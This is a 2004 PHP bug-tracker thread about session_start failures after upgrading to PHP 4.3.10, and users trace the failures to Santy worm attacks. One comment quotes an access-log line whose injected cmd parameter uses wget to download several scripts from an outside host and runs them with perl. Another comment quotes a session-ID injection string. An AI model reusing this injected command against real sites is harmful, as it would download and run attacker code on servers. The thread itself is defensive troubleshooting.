ID: 25876 Comment by: mak123 at poczta dot onet dot pl Reported By: golden at riscom dot com Status: Assigned Bug Type: Session related Operating System: freebsd 4.8 PHP Version: 4.3.9-4.3.10 Assigned To: sas New Comment:
I found many log lines with: ...&PHPSESSID=http://www.visualcoders.net/spy.gif?..... or other session variables like osCsid, IDP, sess_id - and there is huge correlation between number of such attacks and time when sessions hang with 'Failed to initialize...' error. After 50 - 70 such request in 10 - 15 seconds php refused to handle session_start() function. Previous Comments: ------------------------------------------------------------------------ [2004-12-28 20:32:21] mak123 at poczta dot onet dot pl I've added 'php_value session.save_handler "files"' line to config file and errors disappeared. ------------------------------------------------------------------------ [2004-12-28 19:21:28] cruiser at ptcruiserclub dot org I'm using php 4.3.10 on Apache2.4.20 on Redhat 9 Lots of this error repeating over and over in apache error_log: "PHP Warning: Unknown(): A session is active. You cannot change the session module's ini settings at this time. in Unknown on line 0" All the errors correlate to the Santy worm attacks on my oscommerce store in the apache access_log /index.php?cPath=34&osCsid=http://www.visualcoders.net/spy.gif?&cmd=cd%20/tmp;wget%20www.visualcoders.net/spybot.txt;wget%20www.visualcoders.net/worm1.txt;wget%20www.visualcoders.net/php.txt;wget%20www.visualcoders.net/ownz.txt;wget%20www.visualcoders.net/zone.txt;perl%20spybot.txt;perl%20worm1.txt;perl%20ownz.txt;perl%20php.txt adding some mod_rewrite rules in httpd.conf to redirect the worm away stopped the errors. ------------------------------------------------------------------------ [2004-12-28 12:33:28] mbi at euro-ip dot net After the recompile of PHP 4.3.10 with a session.c of 4.3.9, the problems seem to have disapeared. It's quite difficult to be sure, because the problem only occured once in a while (and it all took of about a week after the initial upgrade). Some other people, using our services, affected by the problems, tell me that they are gone by now (without setting a session handler via ini_set). I'm quite aware there are some unfixed bugs in the session.c of 4.3.9, but the other way was quite unacceptable for production usage. Maybe somebody with better knowledge of the code should take a look at the changes between 4.3.9 and 4.3.10 in "session.c". We're using Apache 1.3.33 with PHP 4.3.10, mod_ssl 2.8.22 on FreeBSD 4.10-RELEASE-p3. The current configuration has been rock-solid for months and besides some minor upgrades to Apache, PHP and some minor OS fixes, nothing interesting happened to the systems in question. We also noticed this on all of our frontend shared hosting servers. ------------------------------------------------------------------------ [2004-12-28 10:04:44] voyo+php at spider dot pl problem appear few days ago, plenty of sites, most of them by mod_rewrite. php 4.3.8dotdeb, apache 1.3.26 (debian packages). I dont upgrade to 4.3.10, I dont touch anything ! error shows occasionally, not all the time. Maybe this is caused by some worm activity? ------------------------------------------------------------------------ [2004-12-28 09:26:38] onno at triptic dot nl our problems also started about 5 days after the upgrade ------------------------------------------------------------------------ The remainder of the comments for this report are too long. To view the rest of the comments, please view the bug report online at http://bugs.php.net/25876 -- Edit this bug report at http://bugs.php.net/?id=25876&edit=1
